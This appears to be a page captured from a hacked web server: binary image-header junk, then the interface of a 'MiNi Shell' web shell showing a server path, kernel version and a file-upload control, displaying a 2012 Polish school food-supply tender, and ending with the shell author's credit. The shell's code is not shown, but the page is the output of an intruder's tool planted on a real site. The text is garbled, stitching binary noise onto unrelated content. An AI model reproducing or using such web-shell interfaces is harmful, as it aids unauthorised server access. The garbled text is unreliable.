JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/282956-N-2012.html

<p class="kh_header"><b>Rusiec: Dostawa artykułów spożywczych do stołówek Zespołu Szkolno - Przedszkolnego w Woli Wiązowej 42, 97-438 Rusiec</b><br>
<b>Numer ogłoszenia: 282956 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny w Woli Wiązowej , Wola Wiązowa 42, 97-438 Rusiec, woj. łódzkie, tel. 0-43 6766987, 6766021, faks 0-43 6766987.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zspwolawiazowa.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówek Zespołu Szkolno - Przedszkolnego w Woli Wiązowej 42, 97-438 Rusiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W skład niniejszego podmiotu zamówienia wchodzą następujące wyroby:
Część 1 -   CPV 15300000-1 WARZYWA, OWOCE I PODOBNE PRODUKTY
1	ananas w puszce - puszka - 565 g - 20 szt
2	banany - kg - 300 kg
3	buraczki czerwone świeże - kg - 240  kg
4	buraczki czerwone - sł.	0,9 l - 20 szt.
5	brzoskwinie - kg - 80 kg 
6	cebula - kg - 120 kg 
7	chrzan tarty - sł.	170 g - 40 szt.
8	czosnek - główka - 10 szt.
9	brokuły - szt. - 10 szt.
10	brukselka - kg - 10 kg
11	brzoskwinie w puszce - puszka 850 g - 10 szt.
12	dżem Łowicz - sł. 280 g - 100 szt.
13	dżem Łowicz - sł. 330 g - 150 szt.
14	fasola drobna - pacz. 400 g - 60 szt.
15	fasola Jaś lub równoważna - pacz.	400 g - 140 szt.
16	śliwki - kg - 10 kg
17	groch łuskany, połówki - pacz. 400 g - 50 szt.
18	groszek konserwowy - puszka	240 g - 50 szt.
19	gruszki Klapsy - kg - 10 kg
20	grejpfrut zielony - kg - 10 kg
21	jabłka, słodkie - kg - 550 kg
22	kalafior - szt. - 50 szt.
23	kapusta - kg - 450 kg
24	kapusta czerwona - kg - 170 kg
25	kapusta czerwona - sł.	0,9 l - 62 szt.
26	kapusta kiszona - wiadra 5kg - 40szt
27	kapusta kiszona - paczka 1 kg - 120 szt.
28	kapusta pekińska - kg - 170 kg
29	sok COSTA lub CAPRIO - karton 2 l - 1240 szt.
30	ketchup Tortex łagodny - szt. 500 g - 80 szt.
31	koncentrat pomidorowy Pudliszki 30% lub równoważny - sł. 200 g - 390 szt.		
32	kukurydza konserwowa - puszka 400 g - 60 szt.
33	truskawki - kg - 50 kg
34	kiwi - szt. - 160 szt.
35	koper świeży - pęczek - 20 szt.
36	majeranek - pacz. 30 g - 60 szt.
37	marchew świeża - kg - 1000 kg
38	mandarynki - kg - 145 kg
39	ogórek świeży - kg - 110 kg
40	ogórki kiszone - sł. 0,9 l	 - 50 szt.
41	ogórki kiszone - wiadra 3 kg - 40 szt.
42	papryka czerwona - kg - 5 kg
43	papryka mielona słodka - pacz. 20 g	 - 70 szt.
44	pieczarki - skrzynka 4 kg - 25 szt.
45	pieczarki - kg - 30 kg
46	pietruszka natka - pęczek - 20 szt.
47	pietruszka korzeń - kg - 220 kg
48     pomarańcze	 - kg - 160 kg
49     pomidory - kg - 160 kg
50     por - szt. - 180 szt.
51     rodzynki - paczka	100 g	- 10 szt.
52     rzodkiewka - pęczek - 50 szt.
53     sałata - szt. -  80 szt.
54     sałatka warzywna	 - sł.	0,9 l - 36 szt.
55     seler korzeń	 - kg - 250 kg
56     szczaw - sł. 350 g - 40 szt.
57     warzywa mrożona - paczka 400 g - 50 szt.
58     winogron - kg - 30 kg
59     ziemniaki - kg - 7000 kg
Część 2 -   CPV 15500000 -3 PRODUKTY MLECZARSKIE
60	mleko 2% - l - 1 l - 2850 l
61	jogurt owocowy Serduszko - szt.150 g - 1000 szt.
62	maślanka	karton - 1 l - 60 l
63	twaróg półtłusty - kg - 130 kg
64	serek homogenizowany - szt. 150 g - 80 szt.
65	serek topiony - szt. 100 g - 100 szt.
66	serek topiony - szt. 200 g - 70 szt.
67	ser biały Mój ulubiony - opak. 1 kg	 - 60 szt.
68	ser żółty Gouda - kg - 30 kg
69	śmietana 18% - szt. 400 g - 450 szt.
70	śmietana 30% - szt. 400 g - 160 szt.
71	śmietana 36% - karton 500 g - 20 szt.
Część 3 -   CPV 15400000-2 OLEJ I TŁUSZCZE ZWIERZĘCE LUB ROŚLINNE
72	margaryna Mleczna lub równoważ.	 - kostka 250 g - 360 szt.
73	olej Kujawski - szt. 1 l	 - 390 szt.
74	tłuszcze do smarowania kanapek Śniadaniowa - szt.	500 g	 - 660 szt.
Część 4 -   CPV 15600000-4 PRODUKTY PRZEMIAŁU ZIARNA, SKROBI I PROD.  SKROBIOWYCH
75	mąka Szadkowska - kg - 800 kg
76	mączka ziemniaczana - kg - 110 kg
77	kasza manna - kg	- 30 kg
78	kasza jęczmienna-średnia - kg - 130 kg
79	płatki owsiane - opak. 400 g - 20 szt.
80	płatki ryżowe - opak. 400 g - 30 szt.
81	ryż błyskawiczny - kg - 110 kg
82	ryż w torebkach - opak. 400 g - 40 szt.
83	płatki kukurydziane Corn Flakes - opak. 250g - 30szt.
Część 5 -   CPV 15200000 -0 RYBY PRZETWORZONE I KONSERWOWANE
84	filety z miruny do smażenia - kg - 220  kg
85	ryba w oleju Neptun - puszka 175 g - 40 szt.
86	ryba wędzona makrela - kg - 15 kg
Część 6 -   CPV 15900000-7 NAPOJE
87	herbata Saga - paczka 90 g - 280 szt.
88	napój herbaciany, granulowany Ekoland - paczka 300 g - 40 szt.
89	syrop Herbapol - butelka 430 ml - 40 szt.
90	woda niegazowana ŻYWIEC - butelka 1,5 l - 50 szt.
Część 7 -   CPV 15810000-9 PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE
91	bułka - szt.	0,10 kg - 5000 szt.
92	bułka Graham - szt. 0,05 kg - 500 szt.
93	bułka słodka - szt. 60 g - 550 szt.
94	bagietka - szt. - 200 g - 80 szt.
95	chleb - szt.	0,60 kg - 400 szt.
96	chleb - szt.	1 kg - 500 szt.
97	chleb razowy - szt. 0,60 kg - 400 szt.
98	chałka - szt. 0,60 kg - 20 szt.
99	ciasto drożdżowe - szt. 650 g - 50 szt.
100	pączek - szt. 90 g - 200 szt.
101	rogal - szt. 60 g - 300 szt.
Część 8 -   CPV 15100000 -9 PRODUKTY ZWIERZĘCE, MIĘSO I PRODUKTY MIĘSNE
102	boczek wędzony surowy - kg - 40 kg
103	boczek wędzony parzony - kg	na kanapki - 6 kg
104	filet z kurczaka - kg - 150 kg
105	farsz mielone - kg	 - 190 kg
106	karkówka b/k - kg	 - 148 kg
107	kaszanka - kg - 60 kg
108	kiełbasa zwyczajna - kg	- 370 kg
109	kiełbasa szynkowa wieprzowa - kg na kanapki - 30 kg
110	kiełbasa szynkowa drobiowa - kg na kanapki - 30 kg
111	kości schabowe - kg - 650 kg
112	kurczak - kg - 60 kg
113	parówka cienka wyborowa - kg - 100 kg
114	porcja rosołowa - kg - 20 kg
115	schab b/k - kg - 190 kg
116	skrzydełka z kurczaka - kg - 300 kg
117	słonina - kg	- 10 kg
118	smalec - kg	- 30 kg
119	udziec z kurczaka	- kg - 60 kg
120	żeberka - kg - 110 kg
121	gulaszowe - kg - 270 kg
122	wątroba wieprzowa - kg - 75 kg
123	wątroba drobiowa	 - kg - 15 kg
124	parówka gruba - kg - 30 kg
125	wołowina b/k - kg	 - 10 kg
Część 9 -   CPV 15800000 -6 RÓŻNE PRODUKTY SPOŻYWCZE
126	bułka tarta- opak. 0.50 kg - 310 szt.
127	batony Grześki - szt. 39 g - 200 szt.
128	budyń Delecta - opak. 65 g	- 200 szt.
129	ciastka w czekoladzie - kg - 30 kg
130	delicat czerwony - szt.	75 g - 70 szt.
131	cukier	 - kg - 900 kg
132	cukier waniliowy Delecta - opak. 32 g - 130 szt.
133	cukier puder - opak. 400 g - 20szt.
134	sól - kg - 200 kg
135	cynamon - opak. 20 g - 30 szt.
136	czekolada Wedel - szt. 100 g - 160 szt.
137	galaretka Winiary - szt. 79 g - 100 szt.
138	kawa zbożowa Delecta - szt. 500 g - 40 szt.
139	kisiel Delecta - szt. 65 g - 180 szt.
140	kakao Dekomoreno - szt. 100 g - 40 szt.
141	kostki rosołowe drobiowe Kucharek - szt. 180 g - 20 szt.
142	koncentrat buraczany - butelka 220 g - 10szt.
143	koper suszony - szt. 25 g - 20 szt.
144	kwasek cytrynowy - opak. 20 g - 70 szt.
145	makaron Lubella - opak. 500 g - 150 szt.
146	przyprawa do bigosu - opak. 20 g - 30 szt.
147	makaron nitka Międzybrodzki-krajanka - opak. 250 g - 80 szt.
148	makaron świderki Lubella - opak. 500 g - 350 szt.
149	musztarda stołowa - sł.	150 g	- 40 szt.
150	sos sałatkowy Knorr-grecki - opak. 10 g	- 50 szt.
151	majonez Winiary - sł. 620 g - 110szt.
152	lizaki - szt.	6 g - 250 szt.
153	liść laurowy	- opak. 20 g - 20 szt.
154	nutella - szkl. 200 g - 130 szt.
155	żurek Winiary - opak.	50 g - 240 szt.
156	żurek - butelka 500 g - 50 szt.
157	płatki czekoladowe CHOCAPIC	- opak. 300 g - 40 szt.
158	pieprz czarny mielony - opak.	20 g - 40 szt.
159	drożdże - opak. 100 g - 150 szt.
160	proszek do pieczenia - opak. 16 g - 50 szt.
161	proszek do pieczenia - opak. 30 g - 20 szt.
162	przyprawa w płynie Winiary - butelka 1 kg - 30 szt.
163	przyprawa Kucharek - opak.	250g - 230 szt.
164	wafelki - kg	- 30 kg
165	sos do spagetti - opak.	50 g - 40 szt.
166	sos do spagetti Łowicz - sł.	520 g - 20 szt.
167	jajka - szt. - 9000 - szt.
168	pasztet drobiowy kogucik - puszka 160 g - 330 szt.
169	kotlet sojowy a la schabowy POLGRUNT - opak.	100 g - 150szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.40.00.00-2, 15.60.00.00-4, 15.20.00.00-0, 15.90.00.00-7, 15.81.00.00-9, 15.10.00.00-9, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o nie zaleganiu z opłatami wobec ZUS i właściwego Urzędu Skarbowego złożone na załączonym druku stanowiącym załącznik nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zspwolawiazowa.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno-Przedszkolny w Woli Wiązowej 42; 97-438 Rusiec..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 09:00, miejsce: Zespół Szkolno-Przedszkolny w Woli Wiązowej - w sekretariacie - pokój nr 30 lub przesłać na adres Zamawiającego:Zespół Szkolno-Przedszkolny w Woli Wiązowej 42; 97-43 Rusiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com